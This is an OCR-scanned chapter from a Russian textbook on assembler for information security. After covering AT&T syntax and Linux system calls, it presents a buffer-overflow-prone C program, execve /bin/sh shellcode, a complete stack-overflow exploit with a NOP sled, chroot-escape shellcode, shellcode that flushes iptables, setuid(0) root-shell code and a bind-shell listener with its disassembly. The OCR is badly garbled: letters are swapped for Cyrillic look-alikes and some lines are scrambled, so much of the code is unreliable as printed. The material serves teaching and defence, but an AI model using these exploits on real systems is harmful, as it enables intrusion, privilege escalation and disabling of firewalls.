Кстати говоря, Глпих является 32-разрядной операционной системной и изначально 
разрабатывалась для процессоров ние! 386. Так что речь пойдет об ассемблере для про- 
цессоров компании [п(е!. 

Вернемся к синтаксису. Использование суффиксов позволяет использовать перемен- 
ные с именами регистров, что, в некоторых случаях, может лишь усложнить написание 
программы или, в конце концов, просто запутать самого разработчика. 

В то же время перед переменными ставится знак $: 


$10000 
$ОХЕЕЕ0 


Вы, наверное, обратили внимание на $0хНЮ. 0х — это обозначение шестнадцатерич- 
ного числа. Такое замечание может показаться лишним, если вы писали программы на С 
Н0 в данном случае я сравниваются синтаксисы 1е| и АТ&Т. 

Далее перейдем непосредственно к самим командам. К командам подставляется пост 
сы отерый зависит от того, с каким объемом данных она работает. Если команда пере 
с и то подставляется Ъ, если работает со словом, то. подставляется \, если работа: 

и 1м словом, то подставляется |, если используется учетверенное слово - 4. 
и ‚ что касается работы с операндами: если необходимо что-то поместить в при 
мес иерацию следует рассматривать слева направо. Иначе говоря, для того чтобь 

Йт $0ха в регистр %а], необходимо выполнить следующую команду: 
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поУЬ $0ха,%а1 


Стоит отметить очень примечательный префикс — префикс |, обозначающий да 
передачу управления. Он используется с такими командами, как тр, ге, са]: 


]са11 $ргос 


В синтаксисе АТ&Т вместо квадратных скобок используются круглые: 


поу1 (%Ърх},Зеах 


Операторы ассемблера такие же, как и в С, поэтому они приводиться не будут. Будем 
учиться программировать по ходу рассмотрения примеров. 


4.2. Системные вызовы 


Системные вызовы — неотъемлемая часть программы на ассемблере, если, конечно, 
мы не пишем программу с использование библиотеки бс. . 

Все системные вызовы имеют свой номер, который можно узнать, посмотрев файл 
лзг/псаЧе/зуз/зузса|.В. 

Параметры в эти вызовы передаются следующим образом: если их меньше шести, то 
они передаются через регистры, как это было в ОО$, с условием, что в регистр Жеах 
помещается номер системного вызова, а аргументы помещаются в %ебх, Жесх, Же, 
%е51, %е4! в указанном порядке. Результат помещается в регистр %еах. 


Рассмотрим нашу первую программу. 


„.ааса 
Бе! 10; 
„361109 "Ве]110о мох19\п" 
1епчёв = ‚, - $е]11о 
.91ора1 та1п 
па1т: 
поу1 4, зеах 
01 1, %еъх 
0оУ1 $Ве11о,%есх 
поу1 $1епаеВ, %еах 
106 $0х80 
ОУ 1, Зеах 
хог1 Фефх, %ерх 
10 $0х80 


Системный вызов \тЁе() принимает следующие параметры: 
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я дескриптор файла; 
в адрес буфера, хранящего строку; 
я длину буфера. 

Передаем эти параметры через соответствующие регистры в их законном порядке: 
цех — дескриптор стандартного вывода (ГАпих имеет три стандартных устройства вво- 
да-вывода: Ут — ввод, $0 — вывод, $егг — стандартная ошибка), равный 1, адрес 
нашего буфера, содержащего строку, помещаем в %есх, а длину строки (В РО$ это мог- 
до быть вычислено так ]еп = $ - нео) — в Жедх. Далее вызываем прерывание $0х80, 
которое уже передает все данные ядру. Второй системный вызов, вызов ех(), принимает 


один параметр — код завершения (0 — программа завершилась удачно), который мы по- 
местили в регистр %еБх. 


Если параметров у системного вызова больше, то необходимо их все поместить 
в память, а указатель — в Жерх. _ 


43, Как это делают хакеры 


Нет особого смысла в описании всех методов взлома систем. Данная часть книги по- 
священа ассемблеру в [/пих, поэтому рассмотрим лишь самые популярные методики. 
В любом случае все сводится к одному — передать управление на зНе!]-соде, чтобы полу- 
чить управление или выполнить команды. 

Зне|-соде - программа, написанная на ассемблере и хранящая все свои данные в одном 
сегменте с кодом. В среде хакеров считается хорошим стилем написание очень коротких 
УнеЙ-кодов, так как это говорит о знании ассемблера и качественной алгоритмической базе. 

Как уже говорилось, в программных продуктах, функционирующих вместе с ОС, допуска- 
ется большое количество ошибок. Многие из них можно использовать для получения каких- 


то привилегий в операционной системе или для выполнения команд. Для этого хакерами ис- 
пользуются такие ошибки, как: . 


\ переполнение буфера; 
* ошибки форматной строки; 
* ошибки работы с указателями; 
\ неправильная работа с памятью. 
Для выполнения своего кода программы на компьютере обычно используются ошиб- 


ки 
в первых трех типов, так как они позволяют исказить стек выполняемой программы, 
осле чего передать управление на свой код. ° 


; Приведем пример программы, подверженной ошибке переполнения буфера. 
Че <зЕ1п9. > 


Мат (1пе атас, сваг* агау[}) 














276 Ассемблер в задачах защиты инфо 


{ 
спаг БаЕех [100]; 


зе гсру (БаЕЕег, агау [1]); 
тебахр 0; 


Казалось бы, все должно быть отлично: мы копируем в отведенный буфер из ста СИМЬ 
лов первый параметр программы. Но подумайте, что будет, если мы передадим не сто си, 
волов, а двести. Скорее всего, программа завершится неудачно с выбросом соге-файла. 

Давайте рассмотрим эту программу подробнее с точки зрения возможности исполь. 
ния своего кода. Мы уже поняли, что в программе нет проверки на длину входяще 
буфера, что позволяет переполнить буфер, но какой код стоит использовать? 

В качестве примера можно взять любую программу-эксплойт (ехр!ой), иначе говог 
программу, реализующую ошибки в ПО и приводящую к исполнению кода хакера в си 
теме. Ниже приведена часть эксплойта. 


СсВах эве]1соде []= 
"\хер\х1Е\х5е\х89\х76\х08\х31\хс0\х88\х46\х07" 
"\х89\х46\х0с\хЬ0\ хОБ\х89\ хЕ3\х8Я\ х4е\х08\х84\х56\х0с" 
"\хса\х80\х31\ х9\х89\ха8\х40\хсЯ\х80\хе8\хас\хЕЕ\ хЕЕ\хЕЕ" 
"/Б1п/зп"; 

10 

па1п (10 ахас,свах* ахдау[]} 

{ й 
у019 (*51е11)} ()= (У014*) зВе11 сое; | 
51е11 (}; 

тегитп 0; 


} 


Определяем буфер, в котором находятся бинарные данные, — это и есть $Не!]-со% 


Далее в основной программе создаем указатель на функцию зВеП(), которой присваивас` 
указатель на наш $Не|-со4е, после чего выполняем зНе|(). Конечно, эта програм“. 


не реализует уязвимостей. Ее цель — объяснить, что такое зве-соде. › 


Дизассемблируем программу при помощи об]дитр с параметром —О. Пролист- 


до секции зВейсоде, видим следующее: 


080494е0 <з№е11соае>: 
80494е0:  еЪ 1Е пр 8049501 <5ве11соде+0х21> 
80494е2:; 5е рор %е51 
80494е3: 89 776 08 поУ %е31, 0х8 (%е51 } 
80494е6: 31 с0 хох %еах, %еах 


$а1,0х7 (%ез1} 
%еах, Охс (%е51} 
$0хр,%а1 

%е51, %ерх 


80494е8: 88 46 07 ие 
80494еъ: 89 46 0с оу 
80494ее: О 0 ем 
8049470: 89 #3 оу 


ча метке $ 


НЕОН 
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СА ити визе сннье ии ениаминшиаанннн, 
5049422 84 4е 08 ]еа 0х8 (3е51) ,‚ %есх 

8049415 84 56 0с 1еа Охс (%е31)} , $еах 

3049418 са 80 1 $0х80 

80494 2а 31 4% хог Ферх, %ерх 

80494 ЕС 89 48 поу %ерх, %еах 

80494 Ее: 40 пс %еах 

80494ЕЕ: са 80 Е $0х80 

8049501; е8 9с {Е ЕЁ ЕЕ са11 80494е2 <зВе11соде+0х?> 

8049506: 2Е аз 

2049507: 62 69 бе Роипа %ерр,0хбе (%есх} 

804950а: 2Е аз 

8049506: 73 68 )ае 8049575 < БУМАМТС+0х2а> 


Обратите внимание на второй столбец — это и есть наш зне|-соде 
Интересно, что за программу мы пытаемся выполнить. Давайте разбираться 


р 8049501 <звеИсоде+0х21> можем заменить на Лир $соде — пусть это будет пол 
ноценная метка, так проще разбираться. Получается следующая программа: 


‚ехе 
„оба? зхаге 





баги: 

пр $соде 

па1п: 

рор $е51 

лоу В 3е51, 0х8 (3ез1) 

хог В Зеах,Зеах 

поу "№ $а]1,0х7 (%ез1} 

поу %еах, Охс (%е51 ) 

оу $0хЬ, %а1 

поу 3е51,Зе5х и 


1еа 0х8 (3е31) , %есх ' 
1еа Охс {$ез1} , %еах 


116 50х80 

кот ФеЪх, Зерл 

лоу ЗеБх, $еах 

116 Зеах 

ии  $0х80 

о4е: 

ры Зпа1п 

Зея “/Ь1п/ЗВФААААВВВВ" 


пара команда перелает управление на метку $со4е, на которой стоит команда са 
а не я этой команды в стек помещается адрес возврата на следую- 

. “ам находится строка с вызываемой командой. Следовательно 

таш команда рор %е51 получает адрес строки. Если спуститься чуть ниже по 





ООО 
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коду, видно, что в программе два раза вызывается 14 $0х80, т. е. имеются два систему, 
вызова. Что это за вызовы, можно определить, сравнив значения, имеющиеся в \ь:, 
с номерами функций из Лизг/ пса Че/зуз/зузсай.В. | 
В первом случае — это $0%Ь, во втором — $0х!1 (ехесуе, ехй). 
Если со вторым вызовом все понятно (см. описание к программе с \тШе(), то с выч, 
вом ехесуе() нужно разобраться. 


ехесуе() принимает три параметра: 
# название программы; 
Ш указатель на название программы, 
Ш указатель на среду окружения. 


Так этот вызов реализуется на С: 


СВаг *паке [2]; 

паме [0] =” /51п/зВ”; 
паще [1] =М№ЪЪ; 

ехесуе (папе [0] ‚ паще, МОЪЬ); 


на ассемблере это реализуется следующим образом: 


/[адрес строки в %е31 


рор %е51 

/[помещаем адрес строки вместо АААА 

поу %е51,0х8 (%е51} 

/[очищаем %еах 

хог Феах, зеах 

//ставим \0 в конец строки /Ь1п/зВ вместо # 
оу %а1,0х7 (%$е51) 

//залисываем МОБ. вместо ВВВВ 

поу %еах,0хс (%$е51} 


/[номер системного вызова в %еах 
| $0хБ, а] 

//адрес строки в %ерх 

ен $е31,%еЪх 

//адрес АААА в %есх 

1еа 0х8 (%е51},%есх 

//адрес ВВВВ в %е4х 

]1еа — 0хс(%ез1},Зеах 

//вызов прерывания 

{16  $0х80 


Компиляция программы: 
$ асс -с мгИе. 5 
$ 14 -$ -о чеке мге.о 
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п риа оновзечоние . ово ров вв в рав оо воов оно ваачоннов . 
. озона о оон ооо оваваоониьие 
фокзеваняоания 
... 


а т у 
Программ го о работе, но есть некоторые моменты, которые стоило бы обс дит 
. у Ь. 
Дело в ТОМ мы Бе -соде не может содержать нулевых СИМВОЛОВ. Это обусловлено тем, что 
ками, В которых аще все 
ии ра стро го обнаруживается пе уфе 
боты со Ч. реполнение 6 ра, 
о но помещают входную строку до первого нулевого символа, который считается концом 
Оки. Во И збежание попадания нулевых СИМВОЛОВ нужно следовать следующим правилам: 
Г посылать байт - - Йй Т тор полнит 
не в 32-или 16 разрядный регистр, ак как компилято 
посылаемое значение нулями до нужного размера; 
ы 
Г помещать номер системного вызова в регистр %а1|, а нев %еах: оу $0хЬ %а1 
. оа1; 
|] не использовать ф НКЦИЮ ризВ при сохране | 
Т у нии в стеке байта или слова; 
› 


МНИТЬ © ПОС 
Г (9) Т тфиксах ДЛЯ команд, использующих пересылку данных; для сохранения 
п з 
бай а нужно использовать постфикс Ь: ризВЬ $0хЬ: | 
Т › 


я обнуления 1 
илл . ну. регистров использовать операции хог, шс, дес, наприм 
$0,Жеах использовать хог| %еах,Жеах ример, вместо том! 


44. Реализация эксплойта 


В этом разделе м 
ы разработаем эксплой ь. 
. т, реализ ИЙ 
буфера в приведенной выше программе. ‚Р ующий уязвимость переполнения 


У каждой программы есть свой стек, 


казател Я 
щим образом: у ь на который можно получить следую- 


шз19пеЧ 1079 
Е 5р(у019) 


_ аз _("тоу] %езр,%еах"); ^ 


и 
д 


Функция вернет | 
и ль начало стека. У нас есть массив из 100 элементов, необходи- 
код Куда-то | нутрь него. Но при этом не потерять его в памяти, т. е. всегда 
а ал кода. Гакже необходимо следить, чтобы перед нашим кодом в 
него ото у могло бы привести к сбою программы. Мы уже говорили 
арена, значи ‚ наш буфер должен располагаться если не сразу после 
т у ку. Свободные ячейки буфера заполним командой МОР (\х90) 
при переходе в любое место буфера мы просто пропустили бы несколько так- 


Ко Про 
цессо 
ра и затем попали в точку входа нашей ассемблерной программы 


так, создаем новый фе ольшей величины сл 
› даем у бу р 6 е. 1 еду ющего содержания: начало состо- 
.. оманд МОР где-то в середине Т -соде а (6) — 
ыы › Д находится наш фе! /Т. 
вы . т ‚ав конце адрес возвра а. 
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+ае1те ВЕТ 1024 
#4е1пе ВАМСЕ 200 


сваг зпе1}соде[]= . 
"\хеБ\х1Е\х5е\х89\х76\х08\х31 \хс0\х88\х46\х07" 
"\х89\х46\х0с\ хьО\х0Б\х89\ хЕЗ\ хВ\ х4е\х08\хвЯ\х56\х0с" 
"\хса\х80\х31 \хаБ\х89\х48\х40\ хса\ж80\хе8\ хас\хЕЕ\хЕЕ\ ЕЕ" 
"/р1п/зВ"; . 


151 дпе9 1019 
деЁ_5р(уо1а} 
{ 


__азв__ ("ПоУ1 $езр, Феах"}; 


} 


116 
па{п(1п6 атас, сваг *агчу[]} 
{ 
ПЕ оЕзе+=0,5$12е=ВЕТ+ВАМСЕ+1; 
106 1; 
свах БаЕЕ[р317е],*рег; 
1оп9 геё; 
упз19пеа 1оп9 зр; 


12 (аг9с<1) 

{ 
ре1пЕЕ("Треге мвехе по оЕЕзе\п"); 
ех1* 0; 

} . 

оЕЕзех=асо! (агау[1]}; 

зр=дее_5р(}; 

хер=зр-оЕЕзеё; 


резпЕЕ ("Те збаск ропеег 15: 0х%х\п", р}; 
реп ("Те оЁзеё 35: 0х%х\п",0ЕЕ5е(); 
рефпЕЕ ("Веб ат 15: Ох%х\п",гее); 


Рот (1=0;1<5512е;1+=4) 
{ 
*(1опа *) &РАЕЕ] =гее; 
} 
Фот (1=0;1<6з12е-ВАМСЕ*2-з5г1еп (5Ве11с04е) -1;1++) 
БаЕЕ[1]='\х90'; 


ре=БаЕЕ+Ьз12е-ВАМСЕ*2-зет1еп (5Ве]1соде} -1; 


то 





ава 4. Ассемблер в операционной системе Мпих 
.... ово ро ово оао овиосассо ооо ООВ ов ори во ов о раса изо нон вонаик 2 


.. 
... 
„..“ 


ох (1=0;1<56т1еп (зВе1]соае};1++) 
* (рЕг++) =Не11соде [1]; 


БаЕЕ[№312е-1]='\0'; 


вхес1 ("./Уа1тегар1е1", "упегар]е1",раё ); 


Гак как в р ссм | вае С у С б) } | ` с | з *) у Ж 
она › д 


ение от 200 — 
Смеш 700 должно работать, но все-таки помните, что 
ной машины. > это зависит от конкрет 


После выполнения программы буфер выглядит так: 
№Р №ОР „ МОР 5НЕЫ,-СОБЕ ВЕТ ВЕТ ВЕТ 
Алгоритм работы эксплойта: 
получаем указатель на начало стека программы:. 
вычисляем адрес возврата — начало стека минус смещение; 
заполняем весь буфер адресом возврата; 


заполняем буфер до начала зНе|-соде опкодом МОР: 
вставляем зпе|-софе в тело буфера; | 


заканчиваем зНе!-со4де нулевым символом. 


Остановимся подробнее на написании зВе-кодов 


45. Сргоое $Вей-соде 


Свгоо) — ф 
— функция, отвечающая за 
изменение корневого к 
аталога для программ 
ы 


Ункцию используют йр 
-сервера для 

об разграничения доступ 
< а, наприм 
хе ьзователь не имел доступа выше своего домашнего авлоти Риме» для тот 
к ры используют эту функцию в своих зНе|- 
рневого каталога для се 
туп к 

Но 


кодах восстановления первоначально- 


ГИ } х 
5 м 


м . 
ер этой функции 0х34. Ниже приведен алгоритм работы $Ве!]-кода: 
эбнуляем регистры %еах, %есх: 


Сохраняем т 
м один из регистров — это будет конец строки ( символ \0>); 
цать раз сохраняем символ ‘.’; | 


Щаго ] ел е с Л: единицу. Тучится од символа 
код р; 
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пазокввнии вез чан аьов . зознонони ооонвонинесви чисаоснононаоснооуи в иона зониоовоньи 
«соняароно иво вово ооо осо нии оно оо ооо ноя им оо и му оо иа ново ии ния ини ннтие иене 
оно новииннново 


Ш помещаем указатель на вершину стека в регистр %еЪх; 
Ш врегистр %еах помещаем номер системного вызова свгоо! и передаем управление ядру. 


Код программы, написанной на ассемблере под компилятор пазт, приведен ниже. 








Глава 4. Ассемблер в операционной системе Цпих 


} к ооо оороныосновиоан фоаы . |, понра они сие оововнаю . .. 
... она цосное 
мне он ровер Ноно о ок очах носов зивоновови иво 
2 при овосовановоововинани 


]1оор Зта1п {пс 
[[указатель вершины стека помещаем в регистр %ерх, 
[служит для хранения первого и единственного 
10] /Фезр, %ерх 
‚вызов функ 


который 
параметра функции 


поУр $0хЗа, За1 
8175 32 те $0х80 
пап: 
хо есх,есх + 
хот еах, вах 12° 
ризВ есх Вообще говоря, пере 
поу с1,30 Г актерна для вв Но лача параметров через стек, из всех Ошх-систем, наибол 
аа рев: р хар - Но как будет показано ниже, можно, используя эту технологи 
— разн Бубе 0х2е 3 создавать очень компактный код. . 
1оор па1п рузв 
по  ©1,30 Адуапсед ехесуе() оф 
па1п_1пс: 46. ап сх эпей-с е 
дес с1 
ассмо - 
1пс рубе [езр+есх] алесмотрим пример зпеЙ-кода, в котором параметры будут храниться в стеке а 
ес № . №: кода, что существенно сократит размер самой программы. 
1оор па1п_фпс м Алгоритм следующий: 
р поУ ерх, езр 
|| о 
поу а1,61 обнуляем регистр %еах и помещаем его в стек — это будет наш МОТ; 
те 90х80 # вобратном порядке записываем строку /Ъш/зЬ в стек: 
: # врегистр %е , 
Тот же код для компилятора а5. . сш тр %ебх помещаем указатель на вершину стека; 
т Ге яем двой 
ехе и. ое ЛВОИНОе слово до учетверенного и помещаем старшую часть в стек: 
| . щаем в стек указатель на ш/5Ь# 
| . пап й $ АААА И В © 
„о вершины стека. Жесх помещаем значение указател 
. //обнуляем регистры %еах, есх Пример программы. 
| хог1 Фесх, %есх „Сехе 
} хог] Зеах, %еах 10а} па1п 
| //сохраняем %есх, как конец строки та л 
| ризВ1  %есх 
| /[устанавливаем счетчик | Е] Феах, % 
еах 
поур $30,%с] ` ВЫ лу, 
| . й ' ь 1 %еах 
па1п_ризй: ., 151 $0х68732Е6е 
[сохраняем код символа ‘. В $0х69622Е22 
ризВЬ $0х2е . . ы %езр, %ерх 
| /Гвыполняем это действие 30 раз а ' 
| 1оор $ша1п ризй , ЗАЗ ах 
` //снова выставляем значение счетчика 25] еБх 
поУр $30,%с1 о %езр, %есх 
| . . » Й 
| па1п_1пс: не $0хЬ, %а1 
| /Гуменьшаем %с1 и увеличиваем значение Фезр+%есх № $080 
есь %с1 \ 


| $ ось (%езр)%есх 
| есь %с] 

| 

1 
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=, 


Код выглядит очень красиво, подобных встречается достаточно много, но написаны, 
под В$-системы. Данный экземпляр является чуть ли не самым коротким для Илицх. 

Стоит отметить использованный прием — однобайтное обнуление регистра % 
Здесь применяется команда с, расширяющая двойное слово из %еах до учетвереннь,, 
слова в %ех, Жеах. Аналогичная команда с44. ° 

АТ&Т предложила в своем синтаксисе преобразование типов команду из четыре, 
символов СХТу, где х — размер источника, у — размер приемника. 

В некоторых зве|-кодах в самом начале встречаются такие команды, как с44 или с 
Такие зНе|-коды могут работать неправильно, так как неизвестно, что находилос, 
в регистре %ах или %еах до выполнения зве!-кода. Хотя, безусловно, экономия налицо. 


4.7. Нестандартное использование функции ехесуе() 


Заголовок несколько обманчивый. Ехесуе() будет использоваться вполне стандартно, 
Только вызывать он будет не оп/зВ, а программы, критически важные для системы. Так. 
выполняя /5БшИраез —Е можно нарушить работу ВгеммаП, что, несомненно, скомпроме- 
тирует безопасность сервера. 

Ниже приведен код программы. 


„Сехе ы 
.9]ора1 зкате 

эфаго: 

/[обнуляем регистр %едх и сохраняем его в стеке - ‘\0’ 
хот] зеах, зеах 

ру511 $еах 

/[сохраняем в стеке слово ‘-Е’ в обратном порядке 

разм $0х4624 


//помещаем указатель вершины стека в регистр $е5} 
/[и снова вставлем ‘\0’ в стек 


оу] Фезр, %е51 

ру$В1 %еах . 

//помещаем /з3п/1рсаБ1ез в стек в обратном порядке 
ру$В1 $0х73656с62 

рН] $0х61747069 


//сохраняем указатель вершины в регистре $е41 
//в стеке находится ‘1рёаБ]ез’ в обратном порядке 


поУ1 $езр, %е91 
разв] $0х2Е6е6962 
ру$В1 $0х732Е2Е2Е 


//сохраняем а %ерх указатель вершины стека 
//и сохраняем в стеке следующие значения: 
/[ '\0' 

// указатель на ‘-Е\0” 

// указатель на ‘+рёар1ез\0’ 

оу] Зезр, зе х 

ра5В1 %еах 

ра$В1 $е51 


_ РР = 
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«пзеовн окон оон о бобов оно ана нано бью е 
} изъян поро о оса ва а авиа анонс оп оо о чо но и оорронаниннвннаи зночацианаки сию 
кобаюоония 


ыы зе41 
‚’заносим в Регистр Фесх адрес структуры паше (см. первый пример) 
1 %$езр,%есх 
пувыполняем ехесуе (} 


 Феах,Зеах м 
. | ; 
от $0хЬ,%а1 
ри $0х80 
се 


Приведенный код интересен не только по алгоритму, но и по характеру выполняемых дей- 
лвий. Не всегда ЯгеммаЙ разрешает подсоединяться к серверу изнутри сети к определенным 
сервисам. Этот 5ве|-со4е показывает, что во многих случаях уверенность системных админи- 
сраторов в неуязвимости их серверов безосновательна. 


4.8. Использование бита $ 


Бит $ устанавливается программой сЫто4 для предоставления прав владельца файла 
исполнителю на время выполнения программы. В системе много программ, которые 
используют эту возможность, например для открытия одного из портов, находящихся 
з промежутке 0-1024. 

Такие программы обычно после действий, требующих особых прав, возвращают 
исходные права процессу, т. е. права владельца процесса, права исполнителя. Вернуться 
кправам владельца файла можно из любого места программы, и этим пользуются хаке- 
ры, ведь переполнение буфера или другие ошибки возможны совсем не в момент владе- 
ния особыми полномочиями. 

5ве|-код для такого 
ее вызова достаточно прост, и, возможно, не стоило уделять ему 

внимания, однако следует заметить, что данный вызов используется практиче- 
ски во всех 5Ве!]-кодах для повышения привилегий процесса. 


Пример программы, вызывающей /5/зВ с привилегиями суперпользователя 
‚зех | 


.310ра1 зкагЕ 
бат: 
24311  %ерх 


Два] 017 (ЗеЪх) ,Феах 
Е $0х80 


344 
ЗН $0х68732Е6е 
51} — $0х69622Е2Е 


10] Фе [2 
5] вер %ерх 
251]  зебх 

и Фезр, %есх 
ор ЗОЖЬ, а] 
‚ $0х80 
8+ 
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``, 
.. 
“, 


Первый системный вызов программы — $е14(0). Именно он устанавливает текущи 
права пользователя гоо(. ы 


4.9. Использование зу тК() 


Иногда хакеры используют нестандартные действия, например создание символиц,. 
ской ссылки на /Б1/5Ь в текущем каталоге. Казалось бы, вещь совершенно ненужна; 
Но бывают такие ситуации, когда, например, при помощи предоставленной оболочку 
нельзя выйти из текущей директории. В этом случае есть необходимость создать ссыль, 
и поместить ее в текущую директорию или предоставить какому-то процессу дост 
к оболочке по другому имени. 
| Ниже приведен пример программы с использованием синтаксиса ше! (пазт): 


В1Т5 32 
Зир эНоге са111 
01%: 

‚ рор е51 

у хог еах, еах 

и шоу рубе [ез$1+7],а1 
№ оу Буке [ез1+10] ,а1 “ 

| шоу Бубеа!,83 

|. ]еа ерх, [ез1] 
]еа есх, [е51+8] 

® 0х80 
са111%: 
са] 901% 
ар "Иор/з зай" 
и синтаксиса АТ&Т: 

‚Сехе 
.91ора] збаге 
эсаге; 
пр $са111% 
9015: 
рор1 %е51 
хог]1 %еах, Феах 
поуь $а1,7 (%е51) 
моУь $а1,10 (%$е$1) 
поур -$83,3а1. 
]еа1 (%3е51), Зерх 
]еа1 8 (%е51) ,‚ %есх 
105 $0х80 
са1116: 
са11 Зо 
„зстлпа '/БЗп/ $$ 

| 

| 

| 








„= 
Аа иен 
д. 


все достаточно просто. Пример приведен для демонстрации неординарности исполь- 


ания зне|-кодов. При защите своей системы следует учитывать все варианты. 
зов 


410. Написание зпей-кода с использованием системных 
вызовов $0сКе{() 


роп-ВеЙ — программа, открывающая доступ к оболочке удаленно подключившемуся 
пользователю. Хакеры используют ро\-зБе| на различных хостинговых серверах, для 
того чтобы получить доступ к командному интерпретатору. Программа на С, открываю- 


дая на определенном порту командный интерпретатор с правами пользователя, запус- 
тившего этот процесс. 


316 з0с, С; , 
вЕГаСт зоскаЯаг_1п зегу аадг; 
вегасЕ зоскаааг 11 с11 аааг; 


0 палл (} 

{ 

| 1Е(ЕохК()==0) 

{ 

зегу а@дтг.51п_Гап1]у=АЕ ТМЕТ; 
`зегу адаг.51п аЧаг.з_аЧду=В оп] (ТМАБОВ_АМУ); 
зегу аЧ9г.51п рогс=Вопз (55555); 
зос=5оске* (АЕ ТМЕТ, 50СК 5ТВЕАМ, 0); 
Ь1п9 (зос, (56 гс зоска@Аг *) &5егу_аЧат, 


$12е0Ё (зегу_адаг)); 
115сеп(50с,1); 


с]1=ассерё (з0с, (56 тасе зосхадаг *)&с11 аЧЧх, 
$12е0Ё(с11 адах)}; 
Чар? (с11,0); 


Чпр2 (с11,1); 
Чар? (с11,2); 
ехес! ("/Бап/зВ", "зв", 0); 


Алгоритм следующий: 


заполнение структуры, отвечающей за сервер: номер порта, протокол, адрес, к которому 
нужно привязать сервер; 


системный вызов зосКе{() для создания сокета (50сКе!); 
привязка к сокету структуры, описывающей настройки сервера; 
вход в режим прослушивания для одного подключения; 
создание экземпляра сокета, который будет отвечать за работу с клиентом; 
дублирование дескрипторов стандартных устройств; 
выполнение оболочки. 
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Теперь попробуем написать 5Пе!]-соде для этой программы. 
Для начала выполним дизассемблирование этой программы. Получим приблизитель, 
следующее: 


(ЗаЬ) 15а 


5 Чара 


Рамр оЁ аззешЬ]ек со4е ог ЕипсЕфоп @чр?: 


0х804 сред 
0х804сЬе2 
0х804среб 
Ох804сЬеа 
0х8 04среЕ 
0х804срЕЁ1 
0х804сЬЕ3 
0х804сЪЕ8 
Ох804срЕе 
Ох8О4СЬЕЕ 


Епа оЁ аззешЬ]ег аопр. 


(Ча6) 91а 


<4пр2>: 
<9ар2+2>: 
<91р2+6>: 
<4ир2+10>: 
<9ир2+15>: 
<9пр2+17>: 
<90р2+19>: 
<$пр2+24>: 
<91р2+30>: 
<9ар2+31>: 


5 Еогк 


ОУ] 
моУ1 
ПОУ1 
моУ1 
106 
ПОУ1 
спр1 
] ае 
ее 
пор 


0х8 (%е5р,1), Зесх 

0х4 ($езр,1} ‚ Зерх 

ЗОхЗЕ, Зеах 

$0х80 

$еах, $ерх 

ЗОХЕЕЕЕТОО01 , Зеах 

0х804сас0 <__зузса11 еггхог> 


$ерх, %еах . 


Рошр о аззещЬ1ек сое Ёог Еапсё1оп Тогк: 


0х804са90 
0х804са95 
0х804са97 
0х804са9с 
0х804саа2 
0х804саа3 
0х804саа4 
0х804саа5 
0 х804сааб 
Ох804саа?7 
0х804саа8 
Ох804саа9 
0х804сааа 
Ох8О4сааь 
0х804саас 
0х804сааа 
0х804саае 
0х804саа{ 


<ЕогК>: 
<Еогк+5>: 
<ЕокК+7>: 


<Еогк+12>: 
<ЕогКк+18>: 
<Еогк+13>: 
<Еотк+20>: 
<Еогк+21>: 
<Еокк+22>: 


<Еогк+23>; 
<Еогк+24>: 
<Еогк+25>: 
<Еоук+26>: 
<Еогк+27>: 
<Еогк+28>: 
<Еогк+29>; 
<Еогк+30>: 
<Еогк+31>: 


оу] 
1пе 
сир! 
зае 
геё 
пор 
пор 
пор 
пор 
пор 
пор 
пор 
пор 
пор 
пор 
пор 
пор 
пор 


$0х2, $еах 
$0х80 
ЗОхХЕЕЕЕЕОО1 , Зеах 
0х804сас0 <__зузса11 еггог> 


Ета оЕЁ аззевр1ег Чппр. 


(Ч4Ь) 15а восКее 
Ришр оЕ аззешЬ1ег соде 


Рог Еапсё1оп зоскей: 


Глава 4. Ассемблер в операционной системе Нпих 
^ 


=" 


0х804са60 
0х804с962 
0х804<967 
0х8 04с96с 
0х804са70 
0х804са72 
0х804са74 
0х804с977 
0х804са 74а 
0х804са7е 
Ох8 04 сат7Е 


Ета ОЕ аззешр]ет Чипр. 


(чаь) 


<Ь1па>: 
<Ь1ра+2>: 
<Ь1па+7>: 
<Ь1109+12>: 
<р1па+16>: 
<Ь1п9+18>: 
<Ь11а+20>: 
<р1па+23>: 
<р1па+29>: 
<Ь11п9+30>: 
<Б11па+31>: 


Ч15аз 1156еп 
Ришр оЁ аззеш1ег со4е 





Ферх, Зеах 

$0х66, $еах 

$0х2, Зе х 

0х4 ($е5р,1)} ‚ Зесх 

$0х80 

Феах, зерх 

ЗОХЕЕЕЕЕЕВЗ, Зеах 

0х804сас0 <_ 5узса11 егког> 


Рог Ецпсефоп 115%еп;: 


0х804са80 <115кеп>: поУ] 
0х804са82 <115Ееп+2>: моУ1 
0х804са87 <115Ееп+7>: поу1 
Ох804са8с <115Ееп+12>: ]еа1 
0х804са90 <115Ееп+16>: 1пе 
0х804са92 <]115%еп+18>; поуУ1 
0%х804с494 <1155еп+20>: спрИ 
0х804са37 <1155еп+23>; дае 
Ох804са9а <115Ееп+29>: геё 
Ох804са3е <1155еп+30>: пор 
Ох804са9Е <1155еп+31>: пор 
Епа оЕЁ аззещЬ]ег аппр. 

(За) 415аз ассерё 


Вишр оЁ азземЬ]ег софе Рог Еипсё1о 


0х804са40 < ассер%>: ПОУ1 
0х804с942 < ассере+2>: №ОУ1 
0х804с947 < `ассерх+7>: воУ1 
0х804са4с < ассер(+12>: 1еа1 
0х804с450 < ассерт+16>: 1пе 
0х804са52 < ассерх+18>;: шоу! 
0%х804с4954 < ассере+20>; стр! 
0х804са57 < ассерт+23>: 3ае 
Ох804са5а < ассере+29>; теф 
Ох804са5е < ассер‹+30>: пор 
Ох 04са5ЕЁ < `ассерх+31>: пор 


Епа оЁ аззетБ1]ек 4ипр. 
Приведем все это к более понятному виду: 


Ферх, зеах 


$0х66, %еах 


$0х4, Зерх 

0х4 (%е5р, 1), $есх 
$0х80 

$едх, зе х 


ЗОХЕЕЕЕЕЕВЗ, Зеах 
Ох804сас0 <_ 5узса]1] ехгог> 


__ассере: 
$ерх, $еах 
$0х66, Зеах 
$0х5, зерх 
ОХА (3е5р,1) , $есх 
$0х80 
$еах, $ерх 
ЗОХЕГЕТЕЕВЗ, Зеах 
0х804сЧс0 <_ зу5са1] еггог> 





0х804саа0 <воскес>: МОУ1 $ерх, зеах 4ир2 (с11,0} | 
Ох804саа2 <зоскее+2>;  поУ1 $0х66, Зеах /|по завершении предыдущей функции в %еах дескриптор 
0х804саа7 <зоскех+7>:  моу1 $0х1, зерх й //сокета, который передаем как второй параметр, 
Ох804саас <зосКеф+12>: 1еа1 0х4 ($езр,1) ‚ %есх /позтому помещаем его в регистр %еьх 
Ох804сар0 <зоскех+16>; 116 $0х80 номер системного вызова помещаем в регистр %еах 
